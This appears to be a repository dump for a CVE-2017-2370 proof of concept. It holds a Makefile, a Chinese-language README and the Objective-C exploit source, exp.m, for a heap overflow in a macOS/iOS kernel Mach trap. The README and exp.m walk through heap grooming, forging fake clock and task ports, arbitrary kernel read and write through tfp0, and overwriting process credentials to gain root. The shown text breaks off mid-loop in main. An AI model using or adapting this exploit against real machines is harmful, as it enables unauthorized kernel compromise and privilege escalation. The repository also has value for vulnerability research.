├── exp ├── Makefile ├── README.md ├── exp.m └── tmp.out /exp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Peterpan0927/CVE-2017-2370/HEAD/exp -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | TARGET = exp 2 | 3 | all:$(TARGET) 4 | 5 | CFLAGS = "" 6 | FRAMEWORKS = -framework IOKit -framework Foundation -framework CoreFoundation 7 | 8 | $(TARGET): exp.m 9 | clang $(CFLAGS) $(FRAMEWORKS) -pagezero_size 0x16000 $^ -o $@ 10 | clean: 11 | rm -f -- $(TARGET) 12 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 0x00.前言 2 | 3 | 这次提权利用的是`mach_voucher_extract_attr_recipe_trap`存在的一个漏洞,而利用方法的核心就是通过`MACH_MSG_OOL_PORTS_DESCRIPTOR`消息。 4 | 5 | 关于`mach_msg ool`简单来说当发送一个包含`ool descriptor`的`msg`时,内核会将指定的数据从用户空间复制到内核空间,并且内核会一直保持这部分数据,直到目标 task 处理了消息。同样,当目标进程接收一个包含`ool descriptor`的消息时,内核会将数据从内核空间复制到用户空间(不一定是真正的复制)。因此可以利用这个技术点向内核堆中写入数据或者从内核读取数据。 6 | 7 | 由于这个漏洞的利用比三叉戟要复杂得多,所以我就一步步的慢慢去剖析了,从漏洞的产生点到一步步的利用,代码可以参考我的[github](https://github.com/Peterpan0927/CVE-2017-2370) 8 | 9 | # 0x01.漏洞产生点 10 | 11 | 在iOS 10和macOS 10.12中添加的新功能中有一个函数叫做`mach_voucher_extract_attr_recipe_trap`,是一个可以在沙盒内调用的`Mach trap`,下面是这个函数的源代码: 12 | 13 | ```c 14 | kern_return_t 15 | mach_voucher_extract_attr_recipe_trap(struct mach_voucher_extract_attr_recipe_args *args) 16 | { 17 | ipc_voucher_t voucher = IV_NULL; 18 | kern_return_t kr = KERN_SUCCESS; 19 | mach_msg_type_number_t sz = 0; 20 | //将recipe_size的地址拷贝到sz中,此时sz存放的就是kalloc_size的值了 21 | if (copyin(args->recipe_size, (void *)&sz, sizeof(sz))) <---------- (a) 22 | return KERN_MEMORY_ERROR; 23 | 24 | if (sz > MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE) 25 | return MIG_ARRAY_TOO_LARGE; 26 | 27 | voucher = 
convert_port_name_to_voucher(args->voucher_name); 28 | if (voucher == IV_NULL) 29 | return MACH_SEND_INVALID_DEST; 30 | 31 | mach_msg_type_number_t __assert_only max_sz = sz; 32 | 33 | if (sz < MACH_VOUCHER_TRAP_STACK_LIMIT) { 34 | /* keep small recipes on the stack for speed */ 35 | uint8_t krecipe[sz]; 36 | if (copyin(args->recipe, (void *)krecipe, sz)) { 37 | kr = KERN_MEMORY_ERROR; 38 | goto done; 39 | } 40 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 41 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 42 | assert(sz <= max_sz); 43 | 44 | if (kr == KERN_SUCCESS && sz > 0) 45 | kr = copyout(krecipe, (void *)args->recipe, sz); 46 | } else { 47 | uint8_t *krecipe = kalloc((vm_size_t)sz); <---------- (b) 48 | if (!krecipe) { 49 | kr = KERN_RESOURCE_SHORTAGE; 50 | goto done; 51 | } 52 | 53 | if (copyin(args->recipe, (void *)krecipe, args->recipe_size)) { <----------- (c) 54 | kfree(krecipe, (vm_size_t)sz); 55 | kr = KERN_MEMORY_ERROR; 56 | goto done; 57 | } 58 | 59 | kr = mach_voucher_extract_attr_recipe(voucher, args->key, 60 | (mach_voucher_attr_raw_recipe_t)krecipe, &sz); 61 | assert(sz <= max_sz); 62 | 63 | if (kr == KERN_SUCCESS && sz > 0) 64 | kr = copyout(krecipe, (void *)args->recipe, sz); 65 | kfree(krecipe, (vm_size_t)sz); 66 | } 67 | 68 | kr = copyout(&sz, args->recipe_size, sizeof(sz)); 69 | 70 | done: 71 | ipc_voucher_release(voucher); 72 | return kr; 73 | } 74 | ``` 75 | 76 | 1. 通过分析我们可以知道在a点的时候4byte的用户空间指针`args->recipe_size`被写到`sz`中 77 | 2. 在b点的时候,如果`sz`的大小在`MACH_VOUCHER_ATTR_MAX_RAW_RECIPE_ARRAY_SIZE (5120)`和`MACH_VOUCHER_TRAP_STACK_LIMIT (256)`之间的话,就会按照`sz`的值去分配一个内核堆缓冲区 78 | 3. 在c点的时候将用户空间的内存拷贝到刚刚分配的区域,但是传递的拷贝的大小并不是用来分配内核堆的`sz`,而是一个用户空间指针,于是乎就会产生一个堆溢出,我们正是利用这个点进行攻击,并且`copyin`函数有一个特性就是遇到`unmap`的页面就是停止拷贝,这个特性将会在我们的`poc`中得到利用: 79 | 80 | ![copyin](http://omunhj2f1.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202018-07-31%20%E4%B8%8A%E5%8D%8811.42.17.png) 81 | 82 | # 0x01.利用步骤 83 | 84 | 1. 
首先我们要使堆空间可控,这里我们用到的技术是堆风水,因为在`freelist`随机化之后,我们并不知道重新分配的内存块的位置了。 85 | 86 | 首先需要了解mach msg中对`MACH_MSG_OOL_PORTS_DESCRIPTOR`的处理,内核收到复杂消息后,发现是`ports descriptor`就会交给`ipc_kmsg_copyin_ool_ports_descriptor`函数(由`ipc_kmsg_copyin`调用)读取所有的`port`对象。该函数会调用`kalloc`分配需要的内存(64位下分配的内存是输入的2倍,name的长度是4字节),然后将有效的`port`由`name`转换成真实的`ipc_port`对象地址保存,对于输入是`MACH_PORT_NULL或者MACH_PORT_DEAD`的`name`,会保持不变。 87 | 88 | ```c 89 | /* calculate length of data in bytes, rounding up */ 90 | if (os_mul_overflow(count, sizeof(mach_port_t), &ports_length)) { 91 | *mr = MACH_SEND_TOO_LARGE; 92 | return NULL; 93 | } 94 | 95 | if (os_mul_overflow(count, sizeof(mach_port_name_t), &names_length)) { 96 | *mr = MACH_SEND_TOO_LARGE; 97 | return NULL; 98 | } 99 | 100 | if(ports_length == 0){ 101 | return user_desc; 102 | } 103 | 104 | data = kalloc(ports_length); // 分配空间 105 | ... 106 | objects = (ipc_object_t *) data; 107 | 108 | dsc->address = data; 109 | 110 | for ( i = 0; i < count; i++) { 111 | mach_port_name_t name = names[i]; 112 | ipc_object_t object; 113 | if (!MACH_PORT_VALID(name)) { 114 | objects[i] = (ipc_object_t)CAST_MACH_NAME_TO_PORT(name);// IPC_PORT_DEAD continue; 115 | } 116 | ... 117 | } 118 | ``` 119 | 所以攻击的时候我们会发送大量的`MACH_PORT_DEAD`,将内存区域填充为`0xFFFFFFFFFFFFFFFF`(`MACH_PORT_DEAD`),然后触发漏洞,将其中一个`IPC_PORT_DEAD`修改为攻击者布置好的一块内存区域,如果指向的区域是一个合法的`ipc port`结构,那么在接收`OOL PORTS`消息后,就能够在用户空间得到这个`ipc_port`对应的`port name`,进行下一步攻击。 120 | 121 | ![堆风水](http://omunhj2f1.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202018-07-28%20%E4%B8%8B%E5%8D%884.48.43.png) 122 | 123 | 124 | 125 | 2. 
`ipc_object`对象的构造 126 | 127 | 首先我们已经得到了这个`fake port`,接下来要进行信息泄漏就必须知道内核会根据哪些参数来对它进行不同的处理,首先看看`ipc_port`的结构体 128 | 129 | ```c 130 | struct ipc_port { 131 | //ipc_object的指针就在前八个字节,是我们溢出攻击的对象 132 | struct ipc_object ip_object; // port对象的类型 struct ipc_mqueue,ip_messages; 133 | struct ipc_mqueue ip_messages; //消息队列 134 | union { 135 | struct ipc_space *receiver; 136 | struct ipc_port *destination; 137 | ipc_port_timestamp_t timestamp; 138 | }data; 139 | union { 140 | ipc_importance_task_t imp_task; 141 | ipc_kobject_t kobject; // port对应的内核对象 142 | uintptr_t alias; 143 | }kdata; 144 | ... 145 | } __attribute__((__packed__)); 146 | ``` 147 | 148 | 其中有一个port对应的内核对象,而这个`ipc_port`对应的到底是哪种类型的内核对象则是由`ipc_object`的属性来决定了,所以我们其实是针对`ipc_object`进行构造。 149 | 150 | ```c 151 | fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK; //设置为IKOT_CLOCK对象,并处于激活状态 152 | fakeport->io_lock_data[12] = 0x11; //设置port锁处于活动状态,防止死锁 153 | ``` 154 | 155 | 内核就会将这个`ipc_port`认作是用于`IKOT_CLOCK`对象通信的`port`,接下来的目的就是来泄漏内核基址: 156 | 157 | 将这个ipc_port伪造为`IKOT_CLOCK`对象,然后将其`kdata.kobject`指针设置为一个内核地址。每次修改这个内核地址后,在用户空间调用`clock_sleep_trap`,内核中会调用`port_name_to_clock`得到这个内核地址,并将其作为clock参数传递给`clock_sleep_internal`,源码如下: 158 | 159 | ```c 160 | static kern_return_t clock_sleep_internal( clock_t clock, sleep_type_t sleep_type, mach_timespec_t *sleep_time) 161 | { 162 | if (clock == CLOCK_NULL) 163 | return (KERN_INVALID_ARGUMENT); 164 | if (clock != &clock_list[SYSTEM_CLOCK]) 165 | return (KERN_FAILURE); 166 | ... 167 | } 168 | ``` 169 | 170 | 从上面的代码中可以看出如果`clock`的地址不是`clock_list[SYSTEM_CLOCK]`的地址,就会返回`KERN_FAILURE`,否则就会返回其他的返回值,那么我们就可以通过返回值去做遍历(不停修改kobject的值),直到返回值不再是`KERN_FAILURE`为止,那么我们就可以拿到`clock_list[SYSTEM_CLOCK]`在内核中的地址了,而这个地址又不在堆上,而是内核中的一个全局变量,处在一个特定的偏移。接下来就是从这个地方开始往前读每一个页面的头部,找到`MH_MAGIC_64`,也就是`0xfeedfacf`。 171 | 172 | ```c 173 | extern struct clock_ops sysclk_ops, calend_ops; 174 | 175 | struct clock clock_list[] = { 176 | {&sysclk_ops, 0, 0}, 177 | {&calend_ops, 0, 0} 178 | }; 179 | ``` 180 | 181 | 182 | 183 | 3. 
内核任意地址读 184 | 185 | 在我们拿到了这个地址之后,就需要将我们的对象转换为`task`类型,并且找到内核的基址,这样就可以算出`kslide`,进行接下来的`tfp0`操作。 186 | 187 | ```c 188 | //将fake port的类型换成task,因为需要利用pid_for_task这个接口来进行任意地址读 189 | fakeport->io_bits = IKOT_TASK|IO_BITS_ACTIVE; 190 | fakeport->io_references = 0xff; 191 | char* faketask = ((char*)fakeport) + 0x1000; 192 | 193 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 194 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 195 | *(uint64_t*) (faketask + 0x10) = 0xee; 196 | ``` 197 | 198 | 拿到`kobject`的地址,跳到页面开头,在`Yalu102`和`Zheng min`的Poc中对于这个操作的先后是不同的,但是这个并不影响,因为`faketask`的地址同样在这个页面上,所以进行一次与操作都会得到页面的起始地址。 199 | 200 | ```c 201 | uint64_t leaked_ptr = *(uint64_t*)(((uint64_t)fakeport) + 0x68); 202 | leaked_ptr &= ~0x3FFF; 203 | ``` 204 | 205 | 然后就写一个死循环去找`MH_MAGIC_64`,然后进行我们的`tfp0`阶段: 206 | 207 | ```c 208 | while (1) { 209 | int leaked = 0; 210 | *(uint64_t *)(faketask + 0x380) = leaked_ptr -0x10; 211 | pid_for_task(foundport, &leaked); 212 | if (leaked == MH_MAGIC_64) { 213 | printf("found kernel text at 0x%llx\n", leaked_ptr); 214 | break; 215 | } 216 | //往前一个页面 217 | leaked_ptr -= 0x4000; 218 | } 219 | ``` 220 | 221 | 至于为什么可以实现任意地址读,这是因为`pid_for_task`这个函数对传入的`task`没有做任何的校验,只是将传进来的参数转换成地址做一些加减运算: 222 | 223 | ```c 224 | kern_return_t pid_for_task(struct pid_for_task_args *args){ 225 | mach_port_t t = args->t; 226 | ... 227 | t1 = port_name_to_task(t); 228 | p = get_bsdtask_info(t1); 229 | if(p){ 230 | pid = proc_id(p); 231 | err = KERN_SUCCESS; 232 | } 233 | ... 234 | (void) copyout((char *)&pid, pid_addr, sizeof(int)); 235 | AUDIT_MACH_SYSCALL_EXIT(err); 236 | return err; 237 | } 238 | 239 | //pid_for_task_args 240 | struct pid_for_task_args{ 241 | PAD_ARG(mach_port_name_t t); 242 | PAD_ARG(user_addr_r pid); 243 | }; 244 | ``` 245 | 246 | ![pid_for_task](http://omunhj2f1.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202018-07-30%20%E4%B8%8B%E5%8D%882.41.22.png) 247 | 248 | 249 | 250 | 4. 
tfp0 251 | 252 | 整个的流程就是找到内核的进程链表,遍历找到自己的进程的地址和`pid0`的地址。然后根据内核进程拿到`kernel task`的地址,再从`kernel task`中获取`itk_sself(kernel task's port)`,然后将`kernel task`的信息覆盖我们伪造的`ipc port`的信息,再将`fake port`指向伪造的`kernel task `,把`kernel task`的`bootstrap port`设置为真实的`kernel task`的port,然后就可以通过接口`task_get_special_port`拿到`kernel task`的`port`,从而实现任意地址读写,把我们自己的`proc`权限改写成`root`。 253 | 254 | ```c 255 | uint64_t kern_task = 0; 256 | kr32(kernproc+0x18, (int32_t*)&kern_task); 257 | kr32(kernproc+0x18+4 , (int32_t*)(((uint64_t)(&kern_task)) + 4)); 258 | 259 | uint64_t itk_kern_sself = 0; 260 | kr32(kern_task+0xe8, (int32_t*)&itk_kern_sself); 261 | kr32(kern_task+0xe8+4 , (int32_t*)(((uint64_t)(&itk_kern_sself)) + 4)); 262 | 263 | char *faketaskport = malloc(0x1000); 264 | char *ktaskdump = malloc(0x1000); 265 | 266 | for (int i = 0; i < 0x1000/4; i++) { 267 | kr32(itk_kern_sself+i*4, (int32_t*)(&faketaskport[i*4])); 268 | } 269 | 270 | for (int i = 0; i < 0x1000/4; i++) { 271 | kr32(kern_task+i*4, (int32_t*)(&ktaskdump[i*4])); 272 | } 273 | 274 | //dump kernel task port 275 | memcpy(fakeport, faketaskport, 0x1000); 276 | memcpy(faketask, ktaskdump, 0x1000); 277 | 278 | 279 | *(uint64_t*)(((uint64_t)fakeport) + 0x68) = faketask; 280 | *(uint64_t*)(((uint64_t)fakeport) + 0xa0) = 0xff; 281 | 282 | *(uint64_t*)(((uint64_t)faketask) + 0x2b8) = itk_kern_sself; 283 | 284 | //get kernel task 285 | task_get_special_port(foundport, 4, &tfp0); 286 | printf("tfp0 = 0x%x\n", tfp0); 287 | 288 | fakeport->io_bits = 0; 289 | 290 | uint64_t slide; 291 | slide = kernel_base - 0xFFFFFF8000200000; 292 | 293 | printf("kernel_base=0x%llx slide=0x%llx header=0x%llx\n",kernel_base, slide,ReadAnywhere64(kernel_base)); 294 | 295 | //get root 296 | uint64_t cred = ReadAnywhere64(myproc+0xe8); 297 | WriteAnywhere64(cred+0x18,0); 298 | ``` 299 | 300 | ![pwn](http://omunhj2f1.bkt.clouddn.com/%E5%B1%8F%E5%B9%95%E5%BF%AB%E7%85%A7%202018-07-30%20%E4%B8%8B%E5%8D%885.40.37.png) 301 | 302 | 303 | # 0x02.参考链接 304 | 305 | - [ool 
msg](https://bbs.pediy.com/thread-201121.htm) 306 | - [project zero](https://bugs.chromium.org/p/project-zero/issues/detail?id=1004) 307 | - [zheng min](https://jaq.alibaba.com/community/art/show?spm=a313e.7916646.24000001.19.eXT850&articleid=781) 308 | - [Yalu102](https://github.com/kpwn/yalu102) 309 | - And thanks for the help of shrek_wzw 310 | 311 | -------------------------------------------------------------------------------- /exp.m: --------------------------------------------------------------------------------
/*
 * Proof of concept for CVE-2017-2370 (see README.md in this repository): a
 * kernel heap overflow in the mach_voucher_extract_attr_recipe_trap Mach
 * trap, long since patched upstream. The root cause is visible in the kernel
 * excerpt in README.md: the buffer at (b) is sized by `sz`, but the copyin()
 * at (c) uses the user pointer args->recipe_size itself as the byte count.
 *
 * NOTE(review): every raw offset used below (0x68, 0xa0, 0x10, 0x380, 0x18,
 * 0xe8, 0x2b8, 0x8bc490) is a hard-coded structure/symbol offset for one
 * specific kernel build. Nothing in this file derives them, so on any other
 * build the program will read the wrong fields and most likely panic the
 * machine rather than fail gracefully.
 *
 * NOTE: the header names after the #import/#include lines were lost when
 * this file was extracted; they are not reconstructed here.
 */
#import
#import
#import
#import
#include
#include

/* Unused in this file: kIOMasterPortDefault, IO_OBJECT_NULL, IKOT_IOKIT_CONNECT. */
#define kIOMasterPortDefault MACH_PORT_NULL
#define IO_OBJECT_NULL MACH_PORT_NULL
/* Recipe command passed to host_create_mach_voucher() in get_voucher(). */
#define MACH_VOUCHER_ATTR_ATM_CREATE ((mach_voucher_attr_recipe_command_t)510)
/* io_bits layout (README.md step 2): the active flag plus an IKOT_* kind. */
#define IO_BITS_ACTIVE 0x80000000
#define IKOT_TASK 2
#define IKOT_IOKIT_CONNECT 29
#define IKOT_CLOCK 25

/*
 * 4-byte kernel read primitive used before tfp0 exists (README.md step 3).
 * Stores (address - 0x10) at faketask+0x380 and calls pid_for_task() on the
 * fake task port; per the pid_for_task() excerpt in README.md the kernel
 * follows the task's BSD proc pointer (get_bsdtask_info) and copies out the
 * pid field (proc_id), which evidently lives at +0x10 of that pointer -- so
 * the 4 bytes at `address` land in *value.
 * Relies on `faketask` and `foundport` being in scope at every use site
 * (both are locals of main()). It expands to two statements with no
 * do { } while (0) wrapper, so it is only safe in braced statement context,
 * which is how every use below is written.
 */
#define kr32(address, value)\
*(uint64_t*) (faketask + 0x380) = address - 0x10;\
pid_for_task(foundport, value);

/*
 * Message layout used for the heap shaping: header, body, exactly one OOL
 * ports descriptor, and 4 KiB of padding. main() sends it with
 * msgh_size = sizeof(sprz) - 2048.
 */
typedef struct {
    mach_msg_header_t head;
    mach_msg_body_t msgh_body;
    mach_msg_ool_ports_descriptor_t desc[1];
    char pad[4096];
} sprz;

/*
 * User-space mirror of the leading bytes of the kernel's ipc_object
 * (README.md step 2). Only io_bits/io_references are accessed by name; the
 * rest of the fake port page is written through raw offsets in main().
 */
struct ipc_object {
    natural_t io_bits;
    natural_t io_references;
    char io_lock_data[0x100];
};

mach_port_t mport = 0;  /* voucher port created by get_voucher(); target of the trap */
mach_port_t tfp0 = 0;   /* kernel task port, MACH_PORT_NULL until the last stage of main() */

/*
 * Copy `size` bytes of kernel memory at `from` into the user buffer `to`,
 * in chunks of at most 0x1000 bytes, via the kernel task port `tfp0`.
 * (Same name as the kernel's copyin but the opposite direction.)
 * The mach_vm_read_overwrite() return value is ignored: on failure `to` is
 * simply left unchanged, so callers see stale/zero data, never an error.
 * `outsize` is passed to every call but never read back.
 */
void copyin(void* to, uint64_t from, size_t size) {
    mach_vm_size_t outsize = size;
    size_t szt = size;
    if (size > 0x1000) {
        size = 0x1000;
    }
    size_t off = 0;
    while (1) {
        mach_vm_read_overwrite(tfp0, off+from, size, (mach_vm_offset_t)(off+to), &outsize);
        szt -= size;
        off += size;
        if (szt == 0) {
            break;
        }
        // next chunk: whatever remains, capped at one 0x1000-byte page
        size = szt;
        if (size > 0x1000) {
            size = 0x1000;
        }

    }
}

/*
 * Write `size` bytes from the user buffer `from` to kernel address `to`
 * through `tfp0`. No chunking and no return-value check; a failed write
 * is silent.
 */
void copyout(uint64_t to, void* from, size_t size) {
    mach_vm_write(tfp0, to, (vm_offset_t)from, (mach_msg_type_number_t)size);
}

/* Read one 64-bit value at kernel address `addr` (0 if the read silently fails). */
uint64_t ReadAnywhere64(uint64_t addr) {
    uint64_t val = 0;
    copyin(&val, addr, 8);
    return val;
}

/* Write the 64-bit `val` at kernel address `addr`; returns `val` unchanged. */
uint64_t WriteAnywhere64(uint64_t addr, uint64_t val) {
    copyout(addr, &val, 8);
    return val;
}

/* Read one 32-bit value at kernel address `addr` (0 if the read silently fails). */
uint32_t ReadAnywhere32(uint64_t addr) {
    uint32_t val = 0;
    copyin(&val, addr, 4);
    return val;
}

/*
 * Write the 32-bit `val` at kernel address `addr`; returns `val` unchanged.
 * Note the return type is uint64_t, unlike its uint32_t sibling above
 * (harmless, but inconsistent).
 */
uint64_t WriteAnywhere32(uint64_t addr, uint32_t val) {
    copyout(addr, &val, 4);
    return val;
}

/* Deallocate `size` bytes of this task's own address space at `addr`; failures are only printed. */
void unmap(uint64_t addr, uint64_t size) {
    kern_return_t err = mach_vm_deallocate(mach_task_self(), addr, size);
    if (err != KERN_SUCCESS) {
        printf("failed to unmap memory\n");
    }
}

/*
 * Allocate `size` bytes anywhere in this task's address space and return
 * the base address. On failure the error is printed and 0 is returned,
 * which do_overflow() does not check.
 */
uint64_t map(uint64_t size) {
    uint64_t addr = 0;
    kern_return_t err = mach_vm_allocate(mach_task_self(), &addr, size, VM_FLAGS_ANYWHERE);
    if (err != KERN_SUCCESS) {
        printf("failed to allocate mapping: %s\n", mach_error_string(err));
    }
    return addr;
}


/* Round `val` up to a multiple of `pagesize`; the mask trick requires a power-of-two pagesize. */
uint64_t roundup(uint64_t val, uint64_t pagesize) {
    val += pagesize - 1;
    val &= ~(pagesize - 1);
    return val;
}
/*
 * Create (once, cached in a static) an ATM voucher with
 * host_create_mach_voucher() and return its port name. This is the
 * `voucher_name` argument the vulnerable trap converts at the top of
 * mach_voucher_extract_attr_recipe_trap() (README.md). On failure the error
 * is printed and MACH_PORT_NULL is returned anyway.
 */
mach_port_t get_voucher() {
    mach_voucher_attr_recipe_data_t r = {
        .key = MACH_VOUCHER_ATTR_KEY_ATM,
        .command = MACH_VOUCHER_ATTR_ATM_CREATE
    };
    static mach_port_t p = MACH_PORT_NULL;

    if (p != MACH_PORT_NULL) {
        return p;
    }

    kern_return_t err = host_create_mach_voucher(mach_host_self(), (mach_voucher_attr_raw_recipe_array_t)&r, sizeof(r), &p);

    if (err != KERN_SUCCESS) {
        printf("failed to create voucher (%s)\n", mach_error_string(err));
    }
    printf("create voucher = 0x%x\n", p);

    return p;
}

/*
 * Trigger CVE-2017-2370 once.
 *
 * kalloc_size     value the kernel reads through args->recipe_size at (a)
 *                 in README.md and uses to size its buffer at (b); also the
 *                 number of 0x41 filler bytes placed before the payload.
 * overflow_length / overflow_data
 *                 bytes laid out directly after the filler, i.e. the bytes
 *                 that spill past the kernel buffer at (c).
 *
 * The user buffer is placed so that it ends exactly at an unmapped page:
 * because the kernel's copyin at (c) uses the user *pointer* recipe_size as
 * its length, the copy is only bounded by that unmapped page, where copyin
 * stops (README.md item 3). `recipe_size` points at the 64-bit local
 * `kalloc_size`; the trap copies only its first 4 bytes into `sz`.
 *
 * The trap's return value is stored in `err` but never checked or printed,
 * so a failed trigger is indistinguishable from a successful one here;
 * main() only finds out later when no overwritten port entry turns up.
 */
void do_overflow(uint64_t kalloc_size, uint64_t overflow_length, uint8_t* overflow_data) {

    int pagesize = getpagesize();

    //void *recipe_size = (void *)map(pagesize);

    uint64_t *recipe_size = &kalloc_size;

    uint64_t actual_copy_size = kalloc_size + overflow_length;
    uint64_t roundupnumber = roundup(actual_copy_size, pagesize);
    uint64_t alloc_size = roundupnumber + pagesize;
    uint64_t base = map(alloc_size);
    uint64_t end = base + roundup(actual_copy_size, pagesize);

    // Drop the trailing page so the copy in the kernel faults (and stops) right after the payload.
    unmap(end, pagesize);

    uint64_t start = end - actual_copy_size;

    uint8_t* recipe = (uint8_t*)start;

    memset(recipe, 0x41, kalloc_size);
    memcpy(recipe+kalloc_size, overflow_data, overflow_length);
    printf("roundupnumber:%llu\nalloc_size:%llu\npagesize:%d\nbase:%llx\nroundupact:%llu\nend:%llx\n", roundupnumber,alloc_size,pagesize,base,roundup(actual_copy_size, pagesize),end);
    //trigger the heap overflow!
    kern_return_t err = mach_voucher_extract_attr_recipe_trap( mport, 1, recipe, recipe_size);
}


/*
 * Entry point. Follows the four stages described in README.md:
 *   1. heap shaping with OOL-ports messages, then the overflow;
 *   2. locate clock_list via clock_sleep_trap() on the fake clock port;
 *   3. turn the fake port into a task port and scan down for the Mach-O
 *      header to get kernel_base;
 *   4. obtain the kernel task port (tfp0) and patch this process's creds.
 * Returns -1 if the overwritten port entry or the clock is not found, 0 after
 * the shell spawned at the end exits. Almost no Mach call in this function
 * has its return value checked; asserts are the only failure stops.
 */
int main()
{
    //create mach voucher port
    mport = get_voucher();

    //create fake port
    // A 0x8000-byte anonymous mapping holds the fake ipc_port (first page) and
    // later the fake task (second page, see faketask below). The Makefile
    // links with -pagezero_size 0x16000 and tmp.out shows this mapping at a
    // low address (0x8414000); the relation between the two is not derived here.
    struct ipc_object* fakeport = mmap(0, 0x8000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON, -1, 0);
    // "%p" already prints a 0x prefix, hence "fakeport=0x0x..." in tmp.out.
    printf("fakeport=0x%p\n",fakeport);

    // Pin the fake objects in memory; return value unchecked.
    mlock(fakeport, 0x8000);

    // Stage 2 setup (README.md): an active port whose kobject kind is IKOT_CLOCK;
    // io_lock_data[12] = 0x11 is, per README.md, meant to make the port lock look held.
    fakeport->io_bits = IO_BITS_ACTIVE | IKOT_CLOCK;
    fakeport->io_lock_data[12] = 0x11;

    // 800 receive rights with a send right each; these are the message destinations.
    mach_port_t* ports = calloc(800, sizeof(mach_port_t));

    for (int i = 0; i < 800; i++) {
        mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &ports[i]);
        mach_port_insert_right(mach_task_self(), ports[i], ports[i], MACH_MSG_TYPE_MAKE_SEND);
    }

    sprz msg1;
    memset(&msg1, 0, sizeof(sprz));
    sprz msg2;
    memset(&msg2, 0, sizeof(sprz));

    // 0x1000 port names, all MACH_PORT_DEAD; only the first 32 are sent (desc count below).
    mach_port_t* buffer = calloc(0x1000, sizeof(mach_port_t));

    for (int i = 0; i < 0x1000; i++) {
        buffer[i] = MACH_PORT_DEAD;
    }

    //init heap fengshui msg
    // One OOL ports descriptor with 32 entries: per README.md step 1 the kernel
    // allocates 32 x 8 = 0x100 bytes per message on 64-bit and keeps it until
    // the message is received. 0x100 is also the kalloc size passed to do_overflow().
    msg1.head.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_MAKE_SEND, 0) | MACH_MSGH_BITS_COMPLEX;
    msg1.head.msgh_local_port = MACH_PORT_NULL;
    msg1.head.msgh_size = sizeof(msg1)-2048;
    msg1.msgh_body.msgh_descriptor_count = 1;
    msg1.desc[0].address = buffer;
    msg1.desc[0].count = 0x100/8; //32
    msg1.desc[0].type = MACH_MSG_OOL_PORTS_DESCRIPTOR;
    msg1.desc[0].disposition = MACH_MSG_TYPE_COPY_SEND;

    // send 1-800
    // ports[0] is never used by this loop (i starts at 1).
    pthread_yield_np();
    for (int i=1; i<800; i++) {
        msg1.head.msgh_remote_port = ports[i];
        kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0);
        assert(kret==0);
    }

    // recv 300 - 500 i+=4
    // Receiving frees the kernel-side 0x100-byte buffer, punching holes into
    // the run of allocations. For i >= 400 the port name is forgotten
    // (ports[i] = 0) but the port itself is never deallocated.
    pthread_yield_np();
    for (int i = 300; i<500; i+=4) {
        msg2.head.msgh_local_port = ports[i];
        kern_return_t kret = mach_msg(&msg2.head, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0);
        if(!(i < 400))
            ports[i] = 0;
        assert(kret==0);
    }

    //send 300 - 400 i+=4
    // Re-fill the holes in [300,400); those in [400,500) stay free -- presumably
    // so the kernel's kalloc(0x100) in the trap lands in one of them, directly
    // before a still-live ports buffer.
    pthread_yield_np();
    for (int i = 300; i<400; i+=4) {
        msg1.head.msgh_remote_port = ports[i];
        kern_return_t kret = mach_msg(&msg1.head, MACH_SEND_MSG, msg1.head.msgh_size, 0, 0, 0, 0);
        assert(kret==0);
    }

    // heap overflow here; the voucher port gets released, so the receives
    // below may get no message (author's note, translated)
    // The 8-byte payload is the user-space address of fakeport: if the
    // adjacent allocation is one of the sprayed ports buffers, one of its
    // MACH_PORT_DEAD entries becomes a pointer into this process (README.md step 1).
    do_overflow(0x100, 8, (uint8_t*)&fakeport);

    // 300 - 500 find overflow port
    // Receive each remaining message and look for an entry that is neither
    // MACH_PORT_DEAD nor 0: the kernel turned the injected pointer into a port
    // name for this task. Messages without a hit are destroyed and their port freed.
    mach_port_t foundport = 0;
    for (int i=300; i<500; i++) {
        if (ports[i]) {
            msg1.head.msgh_local_port = ports[i];
            pthread_yield_np();
            // &msg1 rather than &msg1.head: same address (head is the first member), but a type mismatch.
            kern_return_t kret = mach_msg(&msg1, MACH_RCV_MSG, 0, sizeof(msg1), ports[i], 0, 0);
            assert(kret==0);
            for (int k = 0; k < msg1.msgh_body.msgh_descriptor_count; k++) {
                mach_port_t* ptz = msg1.desc[k].address;
                for (int z = 0; z < 0x100/8; z++) {
                    if (ptz[z] != MACH_PORT_DEAD) {
                        printf("ptz[z]=0x%x\n",ptz[z]);
                        if (ptz[z]) {
                            foundport = ptz[z];
                            goto foundp;
                        }

                    }
                }
            }
            mach_msg_destroy(&msg1.head);
            mach_port_deallocate(mach_task_self(), ports[i]);
            ports[i] = 0;
        }
    }
    printf("can't find overflow port.\n");
    return -1;

    // found overflow port
foundp:

    printf("found port!\n");

    // Stage 2 (README.md): with fakeport tagged IKOT_CLOCK, clock_sleep_trap()
    // on foundport returns KERN_FAILURE for every kobject pointer except
    // &clock_list[SYSTEM_CLOCK]. Guess that pointer (written at offset 0x68 of
    // the fake port, with 0xff at 0xa0) in 8-byte steps over 0x40000-byte
    // windows spaced 0x100000 apart, starting 0x500000 above the unslid text
    // base, until the trap returns anything else.
    // After the inner loop completes k == 0x40000, so the "fail" line prints
    // the address just past the window (tmp.out: ffffff8000740000 for i == 0).
    uint64_t textbase = 0xffffff8000200000;
    int k;
    for (int i = 0; i < 0x300; i++) {
        for (k = 0; k < 0x40000; k+=8) {
            *(uint64_t*)(((uint64_t)fakeport) + 0x68) = textbase + i*0x100000 + 0x500000 + k;
